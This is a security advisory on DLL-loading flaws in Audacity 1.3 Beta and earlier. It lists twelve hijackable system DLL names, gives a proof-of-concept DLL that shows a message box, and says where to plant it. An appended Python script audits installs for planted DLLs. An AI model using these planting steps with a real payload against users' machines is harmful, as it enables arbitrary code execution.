Audacity <= 1.3 Beta Multiple Local Vulnerabilities

Name               Audacity
Vendor             http://audacity.sourceforge.net
Versions Affected  <= 1.3 Beta
Author             Salvatore Fresta aka Drosophila
Website            http://www.salvatorefresta.net
Contact            salvatorefresta [at] gmail [dot] com
Date               2010-10-29

X. INDEX

I.   ABOUT THE APPLICATION
II.  DESCRIPTION
III. ANALYSIS
IV.  SAMPLE CODE
V.   FIX

I. ABOUT THE APPLICATION
________________________

Audacity is free, open source software for recording and editing sounds.

II. DESCRIPTION
_______________

The vulnerabilities are caused by the application loading libraries in an insecure manner. I tested versions 1.2.6 (stable) and 1.3 Beta. Other versions could be vulnerable.

III. ANALYSIS
_____________

Summary:

A) Unsafe DLL Loading
B) DLL Hijacking

A) Unsafe DLL Loading
_____________________

Audacity tries to load every DLL present in the Plug-Ins directory without specifying any name. This can be exploited to execute arbitrary code with the privileges of the currently logged-in user. Filesystem I/O and socket operations from the injected DLL have been tested and work.

B) DLL Hijacking
________________

By default, Audacity's installation folder does not contain any DLL files. When the application loads a DLL, it looks first in the installation directory and only afterwards in the system32 directory. Because of this, the load operation can be hijacked by placing a malicious DLL with the same name in the installation directory. Note that a DLL registered in the KnownDLLs list of the running Windows version is mapped from the system directory regardless of the search order, so the set of names that can actually be hijacked depends on the Windows version. The following is the list of affected DLLs:

wintrust.dll
msasn1.dll
msacm32.dll
midimap.dll
wsock32.dll
ws2_32.dll
ws2help.dll
winmm.dll
lpk.dll
usp10.dll
setupapi.dll
crypt32.dll

IV. SAMPLE CODE
_______________

A/B) Unsafe DLL Loading / DLL Hijacking

The following is the sample code (evil.c) for wintrust.dll:

// compile: gcc -shared -o wintrust.dll evil.c
#include <windows.h>

// DllMain runs as soon as the loader maps the DLL into the process,
// i.e. before Audacity calls any export of the library it expected.
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    // Fire once on process attach, not again on every thread attach/detach.
    if (fdwReason == DLL_PROCESS_ATTACH)
        MessageBox(0, "DLL Hijacking!", "Salvatore Fresta", MB_OK);
    return TRUE;
}

Copy the compiled DLL into the Plug-Ins directory to exploit the first flaw (any file name will do, since every DLL in that directory is loaded), and into the installation directory, named as one of the DLLs listed above, to exploit the second flaw.

V. FIX
______

No fix available at the time of writing.
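As a practical check for the two conditions described in section III, the following Python script (added here; it is not part of the original advisory or of the Audacity project) audits an installation directory. It flags any file in the install root whose name matches one of the system DLLs listed in section B, and any DLL at all under the plug-in directory, because section A says every DLL there is loaded regardless of name. It assumes the plug-in folder is named "Plug-Ins" directly under the install root, and the sample directory layout it builds is constructed for the demonstration, not taken from a real install.

```python
import os
import shutil
import tempfile

# Names from section III.B of the advisory: system DLLs that Audacity resolves
# from its own directory before system32, so a same-named file there wins.
HIJACKABLE_DLLS = {
    "wintrust.dll", "msasn1.dll", "msacm32.dll", "midimap.dll",
    "wsock32.dll", "ws2_32.dll", "ws2help.dll", "winmm.dll",
    "lpk.dll", "usp10.dll", "setupapi.dll", "crypt32.dll",
}

# Assumption: the plug-in folder sits directly under the install root.
PLUGIN_DIR = "Plug-Ins"

ROOT_REASON = "system DLL name shadowed in install dir"
PLUGIN_REASON = "DLL in Plug-Ins is loaded unconditionally"


def find_planted_dlls(install_root, hijackable=HIJACKABLE_DLLS):
    """Return (path, reason) pairs for DLLs that should not be where they are.

    Two checks, one per flaw in the advisory:
      - a file in the install root named like a hijackable system DLL
        (section B: Audacity ships no DLLs there, so such a file is foreign);
      - any .dll anywhere under Plug-Ins (section A: each one is loaded at
        startup whatever its name, so each one is code that will run).
    Name matching is case-insensitive because NTFS lookups are.
    """
    findings = []
    for entry in sorted(os.listdir(install_root)):
        full = os.path.join(install_root, entry)
        if entry.lower() in hijackable and os.path.isfile(full):
            findings.append((full, ROOT_REASON))
    plugin_root = os.path.join(install_root, PLUGIN_DIR)
    if os.path.isdir(plugin_root):
        for dirpath, _dirs, files in os.walk(plugin_root):
            for name in sorted(files):
                if name.lower().endswith(".dll"):
                    findings.append((os.path.join(dirpath, name), PLUGIN_REASON))
    return findings


def demo():
    """Build a constructed sample layout (not a real Audacity install), audit
    it, and return findings as root-relative, forward-slash paths."""
    root = tempfile.mkdtemp(prefix="audacity-audit-")
    try:
        os.makedirs(os.path.join(root, PLUGIN_DIR))
        sample_files = (
            "audacity.exe",                              # legitimate binary
            "readme.txt",                                # not a DLL, ignored
            "WinTrust.DLL",                              # planted: section B
            os.path.join(PLUGIN_DIR, "reverb.ny"),       # Nyquist plug-in, ignored
            os.path.join(PLUGIN_DIR, "vst-bridge.dll"),  # planted: section A
        )
        for rel in sample_files:
            with open(os.path.join(root, rel), "wb") as f:
                f.write(b"MZ")  # placeholder bytes; only the name matters here
        return [(os.path.relpath(p, root).replace(os.sep, "/"), why)
                for p, why in find_planted_dlls(root)]
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for path, why in demo():
        print(f"{path}: {why}")
```

Run it against a real install with `find_planted_dlls(r"C:\Program Files\Audacity")`; on a clean install of the affected versions the root check should return nothing, and every hit under Plug-Ins deserves a look at where the file came from.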